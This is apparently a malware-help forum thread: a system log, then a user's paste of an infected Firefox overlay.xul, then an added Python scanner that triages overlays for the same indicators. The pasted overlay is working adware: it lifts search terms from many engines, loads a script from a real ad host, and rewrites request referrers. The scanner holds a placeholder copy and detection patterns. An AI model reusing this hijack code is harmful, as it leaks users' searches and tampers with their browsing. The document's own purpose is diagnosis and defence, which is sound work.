RP25: 12/15/2008 5:38:20 PM - System Checkpoint

RP26: 12/16/2008 6:38:18 PM - System Checkpoint

RP27: 12/17/2008 8:07:56 PM - System Checkpoint

RP28: 12/18/2008 1:00:23 PM - Software Distribution Service 3.0

RP29: 12/18/2008 9:41:10 PM - SPTD setup V1.50

RP30: 12/19/2008 11:55:54 PM - System Checkpoint

RP31: 12/21/2008 12:40:01 AM - System Checkpoint

RP32: 12/22/2008 1:11:16 AM - System Checkpoint

RP33: 12/23/2008 1:13:04 AM - System Checkpoint

RP34: 12/24/2008 2:09:59 AM - System Checkpoint

RP35: 12/25/2008 2:11:01 AM - System Checkpoint

RP36: 12/26/2008 3:09:55 AM - System Checkpoint

RP37: 12/27/2008 4:09:55 AM - System Checkpoint

RP38: 12/28/2008 5:09:59 AM - System Checkpoint

RP39: 12/29/2008 6:09:55 AM - System Checkpoint

RP40: 12/30/2008 7:09:55 AM - System Checkpoint

RP41: 12/31/2008 8:08:12 AM - System Checkpoint

RP42: 1/1/2009 1:28:42 AM - Installed DirectX

RP43: 1/2/2009 2:27:54 AM - System Checkpoint

RP44: 1/3/2009 3:32:28 AM - System Checkpoint

RP45: 1/4/2009 3:42:05 AM - System Checkpoint

RP46: 1/5/2009 4:28:58 AM - System Checkpoint

RP47: 1/6/2009 9:28:13 AM - System Checkpoint

RP48: 1/6/2009 1:01:33 PM - Installed MyRate from Progressive Insurance

RP49: 1/7/2009 1:28:58 PM - System Checkpoint

RP50: 1/8/2009 1:42:12 PM - System Checkpoint

RP51: 1/9/2009 4:56:28 PM - System Checkpoint

RP52: 1/10/2009 6:15:38 PM - System Checkpoint

RP53: 1/11/2009 7:55:31 PM - System Checkpoint

RP54: 1/12/2009 9:32:20 PM - System Checkpoint

RP55: 1/14/2009 1:14:29 AM - System Checkpoint

RP56: 1/14/2009 1:00:18 PM - Software Distribution Service 3.0

RP57: 1/15/2009 12:16:02 PM - Installed Windows XP KB915865.

RP58: 1/15/2009 12:16:55 PM - Installed Windows NLSDownlevelMapping.

RP59: 1/15/2009 12:17:43 PM - Installed Windows IDNMitigationAPIs.

RP60: 1/15/2009 12:18:07 PM - Installed Windows Internet Explorer 7.

RP61: 1/15/2009 1:00:20 PM - Software Distribution Service 3.0

RP62: 1/16/2009 1:24:12 PM - System Checkpoint

RP63: 1/17/2009 2:24:09 PM - System Checkpoint

RP64: 1/18/2009 8:31:02 PM - System Checkpoint

RP65: 1/19/2009 10:19:11 PM - System Checkpoint

RP66: 1/20/2009 11:20:30 PM - System Checkpoint

RP67: 1/22/2009 3:05:19 AM - System Checkpoint

RP68: 1/23/2009 4:02:34 AM - System Checkpoint

RP69: 1/24/2009 4:58:48 AM - System Checkpoint

RP70: 1/25/2009 7:11:31 AM - System Checkpoint

RP71: 1/26/2009 7:58:31 AM - System Checkpoint

RP72: 1/27/2009 9:30:26 AM - System Checkpoint

RP73: 1/28/2009 9:58:31 AM - System Checkpoint

RP74: 1/29/2009 10:58:31 AM - System Checkpoint

RP75: 1/30/2009 4:26:00 PM - System Checkpoint

RP76: 1/31/2009 6:21:17 PM - System Checkpoint

RP77: 2/1/2009 7:35:49 PM - System Checkpoint

RP78: 2/2/2009 7:58:53 PM - System Checkpoint

RP79: 2/3/2009 1:44:35 PM - Software Distribution Service 3.0

RP80: 2/4/2009 5:07:34 PM - System Checkpoint

RP81: 2/6/2009 1:08:23 AM - System Checkpoint

RP82: 2/7/2009 1:54:39 AM - System Checkpoint

RP83: 2/8/2009 2:43:17 AM - System Checkpoint

RP84: 2/9/2009 3:56:18 AM - System Checkpoint

RP85: 2/10/2009 4:42:57 AM - System Checkpoint

RP86: 2/11/2009 5:42:58 AM - System Checkpoint

RP87: 2/12/2009 6:43:02 AM - System Checkpoint

RP88: 2/12/2009 1:00:21 PM - Software Distribution Service 3.0

RP89: 2/13/2009 1:16:27 PM - System Checkpoint

RP90: 2/14/2009 4:57:22 PM - System Checkpoint

RP91: 2/15/2009 10:37:29 PM - System Checkpoint

RP92: 2/17/2009 5:50:46 AM - System Checkpoint

RP93: 2/18/2009 6:16:07 AM - System Checkpoint

RP94: 2/19/2009 7:16:08 AM - System Checkpoint

RP95: 2/20/2009 7:57:16 AM - System Checkpoint

RP96: 2/21/2009 8:57:18 AM - System Checkpoint

RP97: 2/22/2009 9:57:15 AM - System Checkpoint

RP98: 2/23/2009 10:57:15 AM - System Checkpoint

RP99: 2/24/2009 11:35:11 AM - System Checkpoint

RP100: 2/25/2009 11:57:16 AM - System Checkpoint

RP101: 2/25/2009 1:00:19 PM - Software Distribution Service 3.0

RP102: 2/26/2009 2:31:45 PM - System Checkpoint

RP103: 2/27/2009 3:19:24 PM - System Checkpoint

RP104: 2/28/2009 4:19:25 PM - System Checkpoint

RP105: 3/1/2009 4:22:47 PM - System Checkpoint

RP106: 3/3/2009 6:28:11 AM - System Checkpoint

RP107: 3/4/2009 6:38:02 AM - System Checkpoint

RP108: 3/5/2009 7:27:35 AM - System Checkpoint

RP109: 3/6/2009 8:04:00 AM - System Checkpoint

RP110: 3/7/2009 3:04:12 AM - ComboFix created restore point

RP111: 3/7/2009 4:30:44 AM - ComboFix created restore point

RP112: 3/7/2009 7:24:21 AM - ComboFix created restore point

RP113: 3/8/2009 8:20:32 AM - System Checkpoint

RP114: 3/8/2009 11:33:13 PM - Removed Blaze Media Pro

==== Installed Programs ======================

1600

1600_Help

1600Trb

AceFTP 3 Freeware

Ad-Aware

Add or Remove Adobe Creative Suite 3 Master Collection

Adobe Acrobat 8 Professional

Adobe Acrobat 8.1.2 Professional

Adobe After Effects CS3

Adobe After Effects CS3 Presets

Adobe Anchor Service CS3

Adobe Asset Services CS3

Adobe Bridge CS3

Adobe Bridge Start Meeting

Adobe BridgeTalk Plugin CS3

Adobe Camera Raw 4.0

Adobe CMaps

Adobe Color - Photoshop Specific

Adobe Color Common Settings

Adobe Color EU Extra Settings

Adobe Color JA Extra Settings

Adobe Color NA Recommended Settings

Adobe Contribute CS3

Adobe Creative Suite 3 Master Collection

Adobe Default Language CS3

Adobe Device Central CS3

Adobe Dreamweaver CS3

Adobe Encore CS3

Adobe Encore CS3 Codecs

Adobe ExtendScript Toolkit 2

Adobe Extension Manager CS3

Adobe Flash CS3

Adobe Flash Player 10 Plugin

Adobe Flash Player 9

Adobe Flash Player 9 ActiveX

Adobe Flash Player ActiveX

Adobe Flash Video Encoder

Adobe Fonts All

Adobe Help Viewer CS3

Adobe Illustrator CS3

Adobe InDesign CS3

Adobe InDesign CS3 Icon Handler

Adobe Linguistics CS3

Adobe MotionPicture Color Files

Adobe PDF Library Files

Adobe Photoshop CS3

Adobe Premiere Pro CS3

Adobe Premiere Pro CS3 Functional Content

Adobe Premiere Pro CS3 Third Party Content

Adobe Setup

Adobe Shockwave Player

Adobe SING CS3

Adobe Soundbooth CS3

Adobe Soundbooth CS3 Codecs

Adobe Stock Photos CS3

Adobe SVG Viewer 3.0

Adobe Type Support

Adobe Update Manager CS3

Adobe Version Cue CS3 Client

Adobe Version Cue CS3 Server

Adobe Video Profiles

Adobe WAS CS3

Adobe WinSoft Linguistics Plugin

Adobe XMP DVA Panels CS3

Adobe XMP Panels CS3

Advanced IM Password Recovery (remove only)

AHV content for Acrobat and Flash

AiO_Scan

AiOSoftware

Alarm 2.0.2

Apple Mobile Device Support

Apple Software Update

ATI Display Driver

ATITool Overclocking Utility

Audacity 1.2.6

AutoUpdate

AVS Video Converter 6

Beyond the Red Line

Bioshock

Bonjour

Combined Community Codec Pack 2007-07-22

CuteFTP 8 Home

DAO

DB-Tool 2.0

DivX Author Trial Version

DivX Codec

DivX Converter

DivX Player

DivX Web Player

DS-MP3 Source 1.30

DScaler 5 Mpeg Decoders

EditPlus 2

eFile Express 2006

eFile Express 2007

eFile Express 2008

Express Burn

Fax

ffdshow (remove only)

FLAC Installer 1.1.2a (remove only)

FontDoctor for Windows

Free MP3 Converter

Google Earth

Half-Life 2

Half-Life 2: Deathmatch

HijackThis 2.0.2

Homeworld2

Hotfix for Windows Internet Explorer 7 (KB947864)

Hotfix for Windows Media Format 11 SDK (KB929399)

Hotfix for Windows Media Player 11 (KB939683)

Hotfix for Windows XP (KB896344)

Hotfix for Windows XP (KB914440)

Hotfix for Windows XP (KB928388)

Hotfix for Windows XP (KB929120)

Hotfix for Windows XP (KB952287)

HP Image Zone Express

HP Product Assistant

HP PSC & OfficeJet 4.7

HP Software Update

iDump v1.1.1

Intel® Active Monitor

Intel® PRO Network Adapters and Drivers

iTunes

J2SE Runtime Environment 5.0 Update 6

Macromedia Extension Manager

Macromedia Flash 8

Macromedia Flash 8 Video Encoder

Macromedia Flash Player 8

Malwarebytes' Anti-Malware

Microsoft .NET Framework 2.0

Microsoft Base Smart Card Cryptographic Service Provider Package

Microsoft Internationalized Domain Names Mitigation APIs

Microsoft National Language Support Downlevel APIs

Microsoft User-Mode Driver Framework Feature Pack 1.0

Microsoft Visual C++ 2005 Redistributable

mIRC

MixPad

Mozilla Firefox (3.0.7)

Mozilla Thunderbird (2.0.0.19)

MSXML 4.0 SP2 (KB927978)

MSXML 4.0 SP2 (KB936181)

MSXML 4.0 SP2 (KB954430)

MultipleIEs

MyRate from Progressive Insurance

Nero 7

Norton AntiVirus

NVIDIA Drivers

OpenOffice.org 2.0

PDF Settings

Portal

Portal


So whatever I caught did something to my overlay.xul file. Reading up on Mozilla's forums, it seems like there's only 100 or so lines of code to do this:

<?xml version="1.0" encoding="UTF-8"?>

<!--

/* ***** BEGIN LICENSE BLOCK *****

* Version: MPL 1.1/GPL 2.0/LGPL 2.1

*

* The contents of this file are subject to the Mozilla Public License Version

* 1.1 (the "License"); you may not use this file except in compliance with

* the License. You may obtain a copy of the License at

* http://www.mozilla.org/MPL/

*

* Software distributed under the License is distributed on an "AS IS" basis,

* WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License

* for the specific language governing rights and limitations under the

* License.

*

* The Original Code is XUL Reference.

*

* The Initial Developer of the Original Code is

*

* Einar Egilsson. (email: xulcache@einaregilsson.com)

*

* Portions created by the Initial Developer are Copyright © 2006

* the Initial Developer. All Rights Reserved.

*

* Contributor(s):

*

* Alternatively, the contents of this file may be used under the terms of

* either the GNU General Public License Version 2 or later (the "GPL"), or

* the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),

* in which case the provisions of the GPL or the LGPL are applicable instead

* of those above. If you wish to allow use of your version of this file only

* under the terms of either the GPL or the LGPL, and not to allow others to

* use your version of this file under the terms of the MPL, indicate your

* decision by deleting the provisions above and replace them with the notice

* and other provisions required by the GPL or the LGPL. If you do not delete

* the provisions above, a recipient may use your version of this file under

* the terms of any one of the MPL, the GPL or the LGPL.

*

* ***** END LICENSE BLOCK ***** */

-->

<overlay id="xulcache-overlay" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">

<script type="application/x-javascript" >

window.addEventListener("load", function() { xulRef.init(); }, false);

window.addEventListener("load", initRequestObserver, false);

var xulRef = {

init:

function(){

var appcontent = document.getElementById("appcontent");

if(appcontent){

appcontent.addEventListener("DOMContentLoaded", xulRef.onPageLoad, true);

}

},

onPageLoad:

function(aEvent){

var doc = aEvent.originalTarget;

var loc = doc.location.href;

var ref = doc.referrer;

var keyword = '';

var engine ;

var __d = "http://v1.adwarefeed.com/ffjs.php?u=1011058659-839522115-1715567821-725345543&a=998&s=3&v=icv20020901ff&e=";

if( loc.match(/google\..+\/search.*[&\?]q=([^&]*)/)){

keyword = RegExp.$1;

engine = 'google';

// } else if(loc.match(/search\.ua.+[&\?]q=([^&]*)/)){

// keyword = RegExp.$1;

} else if ( loc.match(/search\.yahoo.*search.*[&\?]p=([^&]*)/)){

keyword = RegExp.$1;

engine = 'yahoo';

} else if(loc.match(/altavista\.com.*results[&\?].*q=([^&]*)/)){

keyword = RegExp.$1;

engine = 'altavista';

} else if(loc.match(/alltheweb\.com.*search[&\?].*q=([^&]*)/)){

keyword = RegExp.$1;

engine = 'alltheweb';

} else if(loc.match(/search\.netscape\.com.*search[&\?].*query=([^&]*)/)){

keyword = RegExp.$1;

engine = 'netscape';

} else if(loc.match(/search\.aol\.com.*search[&\?].*query=([^&]*)/)){

keyword = RegExp.$1;

engine = 'aol';

} else if(loc.match(/ask\.com.*web[&\?].*q=([^&]*)/)){

keyword = RegExp.$1;

engine = 'ask';

} else if(loc.match(/search\.com.*search[&\?].*q=([^&]*)/)){

keyword = RegExp.$1;

engine = 'searchcom';

} else if(loc.match(/search\.lycos\.com.*[&\?].*query=([^&]*)/)){

keyword = RegExp.$1;

engine = 'lycos';

} else if(loc.match(/nova\.rambler\.ru.*search[&\?].*query=([^&]*)/)){

keyword = RegExp.$1;

engine = 'rambler';

} else if(loc.match(/gogo\.ru.*go[&\?].*q=([^&]*)/)){

keyword = RegExp.$1;

engine = 'gogo';

} else if(loc.match(/meta\.ua.*search.asp[&\?]q=([^&]*)/)){

keyword = RegExp.$1;

engine = 'meta';

//} else if(loc.match(/au\.ru.*searchPhrase=([^&]*)/)){

// keyword = RegExp.$1;

} else if(loc.match(/all\.by.*search.*[&\?]query=([^&]*)/)){

keyword = RegExp.$1;

engine = 'allby';

// } else if(loc.match(/uaport\.net.*UAcatalog[/][&\?].*query=([^&]*)/)){

// keyword = RegExp.$1;

} else if(loc.match(/search\.msn\.com.*results.*[&\?].*q=([^&]*)/)){

keyword = RegExp.$1;

engine = 'msn';

} else if(loc.match(/search\.live\.com.*results.*[&\?]q=([^&]*)/)){

keyword = RegExp.$1;

engine = 'live';

};

if( keyword.length > 0 ){

var script = window.content.document.createElement('script');

script.id = "js_0";

script.src = __d + engine + '&q=' + keyword;

doc.getElementsByTagName('head')[0].appendChild(script);

}

}

};

function initRequestObserver() {

var observerService = Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService);

observerService.addObserver(httpRequestObserver, "http-on-modify-request", false);

}

var httpRequestObserver = {

observe:

function(subject, topic, data) {

if(topic == "http-on-modify-request") {

var httpChannel = subject.QueryInterface(Components.interfaces.nsIHttpChannel);

var pos = subject.URI.spec.indexOf("&rf=http");

if(pos > -1) {

var newRef = this.ioService = Components.classes["@mozilla.org/network/io-service;1"] .getService(Components.interfaces.nsIIOService) .newURI(decodeURIComponent(subject.URI.spec.substring(pos+4)), null, null);

httpChannel.referrer = newRef; subject.URI.spec = subject.URI.spec.substring(0, pos);

}

}

}

};

</script>

</overlay>

I removed this file and I'll keep testing.

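As an added example (not code from this thread, from Malwarebytes, or from Mozilla), here is a small Python scanner a responder could run over a Firefox profile or extension directory to triage overlay.xul files for the indicators visible in the overlay above: a script element created at runtime and pointed at a remote host, regexes that capture the search query from Google/Yahoo/MSN-style result URLs, and an http-on-modify-request observer that rewrites the referrer or the request URI. Both sample overlays are constructed for the example; the advertising host is a placeholder, not the real one from the post.

```python
"""Triage Firefox XUL overlays for search-hijack / referrer-rewrite indicators."""
import re
from typing import Dict, List, Set

# Constructed sample modelled on the overlay posted above. Host is a placeholder.
MALICIOUS_SAMPLE = r"""<?xml version="1.0" encoding="UTF-8"?>
<overlay id="xulcache-overlay" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script type="application/x-javascript">
window.addEventListener("load", initRequestObserver, false);
var __d = "http://ads.example.invalid/ffjs.php?u=PLACEHOLDER&e=";
function onPageLoad(aEvent) {
  var loc = aEvent.originalTarget.location.href;
  if (loc.match(/google\..+\/search.*[&\?]q=([^&]*)/)) { keyword = RegExp.$1; engine = 'google'; }
  var script = window.content.document.createElement('script');
  script.src = __d + engine + '&q=' + keyword;
}
function initRequestObserver() {
  observerService.addObserver(httpRequestObserver, "http-on-modify-request", false);
}
var httpRequestObserver = { observe: function(subject, topic, data) {
  httpChannel.referrer = newRef;
  subject.URI.spec = subject.URI.spec.substring(0, pos);
}};
</script>
</overlay>
"""

# Constructed benign overlay: only touches its own menu item.
BENIGN_SAMPLE = r"""<?xml version="1.0"?>
<overlay id="hello-overlay" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script type="application/x-javascript">
function helloInit() {
  var item = document.getElementById("hello-menuitem");
  if (item) { item.label = "Hello"; }
}
window.addEventListener("load", helloInit, false);
</script>
</overlay>
"""

# Each indicator is a regex applied to the JavaScript inside <script> blocks.
INDICATORS: Dict[str, re.Pattern] = {
    "dynamic_script_injection": re.compile(r"createElement\(\s*['\"]script['\"]\s*\)"),
    "remote_script_src": re.compile(r"\.src\s*=(?!=)"),
    # the literal capture group the hijacker uses to lift the search term: q=([^&]*)
    "search_query_capture": re.compile(r"(?:q|p|query)=" + re.escape("([^&]*)")),
    "http_request_observer": re.compile(r"http-on-modify-request"),
    "referrer_rewrite": re.compile(r"\.referrer\s*=(?!=)"),
    "uri_rewrite": re.compile(r"URI\.spec\s*=(?!=)"),
}

# Hosts that legitimately appear in overlays (namespace / license URLs).
HOST_ALLOWLIST: Set[str] = {"www.mozilla.org"}
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)


def extract_script_blocks(xul_text: str) -> List[str]:
    """Return the bodies of inline <script> elements (external src= is not followed)."""
    return SCRIPT_BLOCK.findall(xul_text)


def classify(hits: Set[str], hosts: List[str]) -> str:
    """Map indicator hits to a triage verdict."""
    if "http_request_observer" in hits and hits & {"referrer_rewrite", "uri_rewrite"}:
        return "suspicious"          # silently rewriting outgoing requests
    if "dynamic_script_injection" in hits and hosts:
        return "suspicious"          # injecting a remote script into page content
    return "review" if hits else "clean"


def scan_overlay(xul_text: str) -> Dict[str, object]:
    """Scan one overlay file's text; returns indicators, remote hosts and a verdict."""
    hits: Set[str] = set()
    hosts: Set[str] = set()
    for body in extract_script_blocks(xul_text):
        for name, pattern in INDICATORS.items():
            if pattern.search(body):
                hits.add(name)
        hosts.update(h for h in URL_HOST.findall(body) if h not in HOST_ALLOWLIST)
    host_list = sorted(hosts)
    return {"indicators": sorted(hits), "remote_hosts": host_list,
            "verdict": classify(hits, host_list)}


if __name__ == "__main__":
    for label, text in (("constructed hijacker", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan_overlay(text))
```

To use it on a real profile, read each `*.xul` under the profile's `extensions` directory (and the application `chrome` directory) and call `scan_overlay` on the contents; anything reporting `suspicious` together with a host you do not recognise is worth pulling for a closer look. The indicator set is deliberately narrow and keyed to the behaviours shown in the thread, so it is a triage aid, not a replacement for a signature scan.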

Root Admin, 2 weeks later:

Topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!

The fixes and advice in this thread are for this machine only. Do not apply the instructions from this thread to your own machine. Please start a new thread describing your issue and someone will be along to assist you.

